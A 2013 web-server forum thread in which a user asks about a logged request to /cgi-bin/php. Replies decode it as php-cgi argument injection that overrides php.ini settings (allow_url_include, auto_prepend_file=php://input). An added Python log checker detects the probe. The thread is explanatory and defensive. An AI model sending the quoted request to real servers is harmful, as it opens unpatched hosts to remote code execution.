Doug22
Joined: 02 Jun 2013 Posts: 57 Location: Houston TX
Posted: Mon 16 Dec '13 1:14 Post subject: what's going on here?
Just out of curiosity, I've been starting to see a lot of these POST requests in my log from various sites (mostly suspect international ones, but not this one). I used to see them only occasionally, but I'm now seeing a few per day. They are rejected of course by my server, but what's it about? What are they trying to do?
Code:
54.226.0.214 - - [14/Dec/2013:06:35:32 -0600] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 404 217
glsmith Moderator
Joined: 16 Oct 2007 Posts: 2268 Location: Sun Diego, USA
Posted: Mon 16 Dec '13 4:50
Run all that junk after the php? in a URL decoder and you'll get a pretty good idea.
James Blond Moderator
Joined: 19 Jan 2006 Posts: 7373 Location: Germany, Next to Hamburg
Posted: Mon 16 Dec '13 10:40
Well, it is an attempt to attack PHP which runs under plain CGI. The parameters are
Code:
-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n
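Added example (not code from any poster in this thread): a small log check that does what glsmith and James Blond describe, decoding the query string and listing the php.ini directives the request tries to override. It assumes Apache combined log format; THREAD_LINE is Doug22's log entry rejoined onto one line, and BENIGN_LINE is a constructed request for contrast.

```python
"""Flag php-cgi argument injection in Apache access logs.
Added example for this thread, not any poster's code. THREAD_LINE is the
request Doug22 posted, rejoined onto one line; BENIGN_LINE is constructed."""
import re
from urllib.parse import unquote_plus, urlsplit

# Apache combined-format prefix: client, identd, user, [timestamp], "request", status
LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3})')
# php-cgi options in the decoded query: "-d directive=value" overrides php.ini, "-n" skips it.
OPTION_RE = re.compile(r'(?:^|\s)-(?:d\s*([A-Za-z_.]+)\s*=\s*(\S*)|(n))(?=\s|$)')

def decode_query(target: str) -> str:
    """Percent-decode the query string of a request target; '+' becomes space."""
    return unquote_plus(urlsplit(target).query)

def php_cgi_overrides(line: str):
    """Return {directive: value} smuggled into the query string, or None.
    Key "-n" is present when php.ini was to be skipped. A "-d" that is ordinary
    form data (e.g. q=-d) is not preceded by whitespace and is not matched."""
    m = LOG_RE.match(line)
    if not m:
        return None
    found = {}
    for directive, value, skip_ini in OPTION_RE.findall(decode_query(m.group("target"))):
        if skip_ini:
            found["-n"] = ""
        else:
            found[directive] = value
    return found or None

# The log line from the thread, as one line (the forum wrapped it).
THREAD_LINE = (
    '54.226.0.214 - - [14/Dec/2013:06:35:32 -0600] "POST /cgi-bin/php?'
    '%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+'
    '%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+'
    '%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+'
    '%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+'
    '%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+'
    '%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D'
    '%70%68%70%3A%2F%2F%69%6E%70%75%74+'
    '%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+'
    '%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+'
    '%2D%6E HTTP/1.1" 404 217')
# Constructed: a "-d" that is plain form data must not be flagged.
BENIGN_LINE = ('203.0.113.6 - - [14/Dec/2013:07:01:00 -0600] '
               '"GET /search.php?q=-d+foo HTTP/1.1" 200 512')

if __name__ == "__main__":
    print(php_cgi_overrides(THREAD_LINE), php_cgi_overrides(BENIGN_LINE))
```

Running the module prints the decoded overrides for the thread's line and None for the benign one; the same function can be fed every line of an access log to count how often this probe shows up.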
Doug22
Joined: 02 Jun 2013 Posts: 57 Location: Houston TX
Posted: Mon 16 Dec '13 21:44
Well, I'm not sure that gives me a pretty good idea of what they're trying to accomplish, though it is clear that it is some sort of attack. Thanks.
James Blond Moderator
Joined: 19 Jan 2006 Posts: 7373 Location: Germany, Next to Hamburg
Posted: Tue 17 Dec '13 11:43
Doug22 wrote: Well, I'm not sure that gives me a pretty good idea of what they're trying to accomplish, though it is clear that it is some sort of attack. Thanks.
Well, each -d is for define. So the attacker tried to override some of your php.ini settings, like allow_url_include to on.
Anaksunaman
Joined: 19 Dec 2013 Posts: 54
Posted: Sat 21 Dec '13 12:40 Post subject: Attack on older versions of PHP
It's very likely the Linux.Darlloz worm. This worm has shown itself recently, trying to exploit devices with older versions of PHP installed (such as routers, etc.) for some as yet unknown reason. And while I can't say for certain, I have seen a few example logs of this worm that look very close to what you posted.
The security hole it tries to exploit was patched in May 2012, so for newer versions of PHP, you should be fine.
http://www.symantec.com/connect/blogs/linux-worm-targeting-hidden-devices